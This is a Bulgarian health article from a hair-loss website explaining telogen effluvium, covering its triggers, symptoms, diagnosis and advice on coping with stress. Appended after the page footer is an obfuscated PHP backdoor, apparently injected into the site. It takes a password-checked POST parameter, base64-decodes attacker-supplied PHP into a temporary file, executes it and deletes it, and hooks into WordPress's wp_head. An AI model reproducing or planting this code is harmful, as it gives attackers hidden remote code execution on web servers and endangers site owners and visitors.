Телогенен ефлувиум | Косопад

Телогенен ефлувиум

телогенен ефлувиум

косопад

Телогенен ефлувиум е медицинско състояние, което се появява обичайно след преживяване на голям психически или физиологически стрес. Причина може да бъде операция, драстично отслабване, бременност и раждане, преживян страх или прекомерна радост, въобще всичко което ни вади от равновесие. Смята се, че е често срещан вид косопад при жените, който започва с падане на големи количества коса при къпане и ресане.

Косопад от телогенен ефлувиум също така може да бъде предизвикан от употребата на някои специфични лекарства като антидепресанти, бета – блокери против стрес, противовъзпалителни средства, стероиди и хапчета тип антибебе. При протичане косата се изтощава по – бързо от обичайното (принципно животът на космите е няколко години) и преминава във фаза почивка, като след това се възстановяват доста бавно.

Симтоми на косопад от телогенен ефлувиум

Жените обикновено забелязват дифузно разреждане на косата от 6 до 12 седмици след настъпване на събитието предизвикало стрес. Когато стигне пиков момент, ежедневно може да се стигне до загуба на цели шепи косми.

За съжаление въпреки напредъкът на технологиите и до момента няма сигурни тестове за определяне на телогенен ефлувиум. Опитният лекар обаче ще ви разпита за последните събития в личния ви живот и ще прегледа скалпа, за да разбере какво е състоянието на корените и да направи съответните изводи.

Превенция на този тип косопад при жените

В повечето случаи е достатъчно да изчакате известно време и проблемът ще отшуми (особено когато е следствие от бременност, операция или употреба на лекарства). Ако виновникът е някой медикамент, обсъдете с лекаря си възможността за намаляване на дозата или смяна. При положение, че е свързан със стреса от ежедневието, направете всичко възможно да го намалите.

Поддавате ли се на стрес?

Както има различни видове косопад, така има и различни видове хора. Едни преодоляват сравнително лесно превратностите на съдбата, докато на други са необходими месеци, за да забравят дори и малките неволи. Какъвто и да сте запомнете, че да наругаете шефа или да ударите 3 големи за отскок твърде рядко решава проблемите. Също така не е хубаво да задържате болката в себе си, защото това ще се отрази пагубно върху цялостното ви състояние.

Психолози съветват да си изработите навик, при който да замените притесненията с размишления за това как да решите проблема и после да приведете резултата в изпълнение. „Притеснение е, когато мислите ви са блокирани от проблема и не сте в състояние да разсъждавате за нищо друго. Вкарайте известна доза рационално мислене и намерете начин да победите, намирайки подходящо решение. Стресът е безполезен и вреден, не очаквайте нищо хубаво”, споделя психоложката Кимбърли Медлък.

09. септември 2013 20:53:52 от Косопад
Категории: Косопад – Статии | Етикети: | Напишете Коментар

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}